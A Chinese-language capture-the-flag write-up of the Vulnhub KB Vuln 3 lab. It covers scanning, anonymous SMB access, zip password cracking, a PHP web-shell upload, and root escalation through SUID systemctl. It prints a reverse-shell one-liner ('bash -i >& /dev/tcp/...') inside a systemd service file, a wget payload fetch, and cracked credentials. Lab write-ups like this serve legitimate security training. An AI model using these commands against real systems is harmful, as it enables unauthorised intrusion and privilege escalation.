Vulnhub之KB Vuln 3靶机详细测试过程

KB Vuln 3

作者:jason huawen

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:69:ef:ae      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:38:ea:a0      1      60  PCS Systemtechnik GmbH          

利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-11 19:35 EDT
Nmap scan report for bogon (192.168.56.254)
Host is up (0.00042s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 cb04f0363f42f73ace2ff54ce0abfe17 (RSA)
|   256 6106df25d5e1e347fe1394fd740c8500 (ECDSA)
|_  256 5089b6b43a0b6e63121040e2c4f93533 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:38:EA:A0 (Oracle VirtualBox virtual NIC)
Service Info: Host: KB-SERVER; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: KB-SERVER, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time: 
|   date: 2023-04-11T23:35:58
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: kb-server
|   NetBIOS computer name: KB-SERVER\x00
|   Domain name: \x00
|   FQDN: kb-server
|_  System time: 2023-04-11T23:35:58+00:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds

NMAP扫描结果表明目标主机有4个开放端口:22(ssh)、80(http)、139/445(samba)

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ smbclient -L 192.168.56.254                                
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        Files           Disk      HACK ME
        IPC$            IPC       IPC Service (Samba 4.7.6-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            KB-SERVER
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ smbclient //192.168.56.254/Files        
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Oct  2 14:11:49 2020
  ..                                  D        0  Fri Oct  2 13:12:00 2020
  website.zip                         N 38936127  Fri Oct  2 14:11:41 2020

                14380040 blocks of size 1024. 9540188 blocks available
smb: \> get website.zip 
getting file \website.zip of size 38936127 as website.zip (121094.1 KiloBytes/sec) (average 121094.1 KiloBytes/sec)
smb: \> pwd
Current directory is \\192.168.56.254\Files\
smb: \> cd /var
cd \var\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> quit

通过smbclient工具连接目标主机的smb服务,将共享目录中的文件下载到Kali Linux。

─(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ enum4linux 192.168.56.254
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                  
                                                                                                                             
S-1-22-1-1000 Unix User\heisenberg (Local User)         

enum4linux工具识别出目标主机存在用户名heisenberg

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ ls -alh
total 38M
drwxr-xr-x  2 kali kali 4.0K Apr 11 19:38 .
drwxr-xr-x 89 kali kali 4.0K Apr 11 19:34 ..
-rw-r--r--  1 root root 1.8K Apr 11 19:35 nmap_full_scan
-rw-r--r--  1 kali kali  38M Apr 11 19:38 website.zip
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ unzip website.zip 
Archive:  website.zip
[website.zip] README.txt password:                                                                                                                              

website.zip被加密,可以用ziptojohn转换为哈希值,然后利用John the ripper工具进行破解

─$ zip2john website.zip > hashes        
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes --force
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
porchman         (website.zip)     
1g 0:00:00:00 DONE (2023-04-11 19:40) 1.886g/s 8617Kp/s 8617Kc/s 8617KC/s porno852..poppy670
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ cat README.txt     
Hi Heisenberg! Your website is activated. --> kb.vuln
Username  : admin
Password  : jesse
Have a good day !

应该是网站的用户名密码,暂时放在一边。

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
└─$ nikto -h http://192.168.56.254     
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        80
+ Start Time:         2023-04-11 19:44:48 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2240, size: 5b0b40b8dd680, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2023-04-11 19:45:44 (GMT-4) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

根据README.txt文件,是不是要将kb.vuln添加到/etc/hosts文件中?

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
└─$ sudo vim /etc/hosts                                        
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
└─$ cat /etc/hosts            
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.254 kb.vuln


刷新页面,此时返回的页面就不是page not found,其中有Login链接,尝试用前面的Readme.txt中的用户名密码登录,可以成功登录,接下来的目标是将shell.php上传,上传文件没有任何限制,但是文件放在什么位置呢?

从页面源代码:

div class="SMPagesTableCell" ><img style="border-radius: 5px; box-shadow: 0px 0px 7px -1px #333;" title="/Sunrise2/People.jpg" src="files/images/Sunrise2/People.jpg" alt="/Sunrise2/People.jpg" width="545" height="270"></div>

可以猜测文件位置为:

files/images/

需要将shell.php上传到images/backgrounds目录下,即可访问

http://kb.vuln/files/images/backgrounds/shell.php

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
└─$ sudo nc -nlvp 5555                                         
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 38966
Linux kb-server 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 00:04:41 up 34 min,  0 users,  load average: 0.86, 0.42, 0.55
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@kb-server:/$ cd /home
cd /home
www-data@kb-server:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root       root       4.0K Oct  2  2020 .
drwxr-xr-x 24 root       root       4.0K Oct  2  2020 ..
drwxr-xr-x  4 heisenberg heisenberg 4.0K Oct  2  2020 heisenberg
www-data@kb-server:/home$ cd heisengerg
cd heisengerg
bash: cd: heisengerg: No such file or directory
www-data@kb-server:/home$ cd heisenberg
cd heisenberg
www-data@kb-server:/home/heisenberg$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 heisenberg heisenberg 4.0K Oct  2  2020 .
drwxr-xr-x 3 root       root       4.0K Oct  2  2020 ..
-rw-r--r-- 1 heisenberg heisenberg  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 heisenberg heisenberg 3.7K Apr  4  2018 .bashrc
drwx------ 2 heisenberg heisenberg 4.0K Oct  2  2020 .cache
drwx------ 3 heisenberg heisenberg 4.0K Oct  2  2020 .gnupg
-rw-r--r-- 1 heisenberg heisenberg  807 Apr  4  2018 .profile
-rw-r--r-- 1 heisenberg heisenberg    0 Oct  2  2020 .sudo_as_admin_successful
-rw-r--r-- 1 root       root         33 Oct  2  2020 user.txt
www-data@kb-server:/home/heisenberg$ cat user.txt
cat user.txt
6346c6d19751f1a3195f1e4b4b609544
www-data@kb-server:/home/heisenberg$ 

从而得到user flag

提权

www-data@kb-server:/var/www/html/sitemagic$ find / -perm -4000 -type f 2>/dev/null
<l/sitemagic$ find / -perm -4000 -type f 2>/dev/null
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/at
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/bin/systemctl
/bin/umount
/bin/su
/bin/mount
/bin/fusermount
/bin/ping

可以利用systemctl的SUID位进行提权,参考GTFOBINS网站给出的参考步骤进行提权

sudo install -m =xs $(which systemctl) .

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF

因此接下来编写一个service文件,Spawn一个新的反弹shell

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ cat shell.service   
[Service]
Type=oneshot
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.206/6666 0>&1'

[Install]
WantedBy=multi-user.target

将shell.service文件上传到目标主机/tmp目录

www-data@kb-server:/tmp$ wget http://192.168.56.206:8000/shell.service
wget http://192.168.56.206:8000/shell.service
--2023-04-12 00:31:31--  http://192.168.56.206:8000/shell.service
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 132 [application/octet-stream]
Saving to: 'shell.service'

shell.service       100%[===================>]     132  --.-KB/s    in 0s      

2023-04-12 00:31:31 (46.4 MB/s) - 'shell.service' saved [132/132]


将shell.service 移动到网站目录

www-data@kb-server:/var/www/html/sitemagic$ mv /tmp/shell.service .
mv /tmp/shell.service .

然后创建服务

www-data@kb-server:/var/www/html/sitemagic$ systemctl link /var/www/html/sitemagic/shell2.service

启动服务

www-data@kb-server:/var/www/html/sitemagic$ systemctl start shell2.service


热门相关:帝少的专属:小甜心,太缠人   刺客之王   致灿烂的你   薄先生,情不由己   第一神算:纨绔大小姐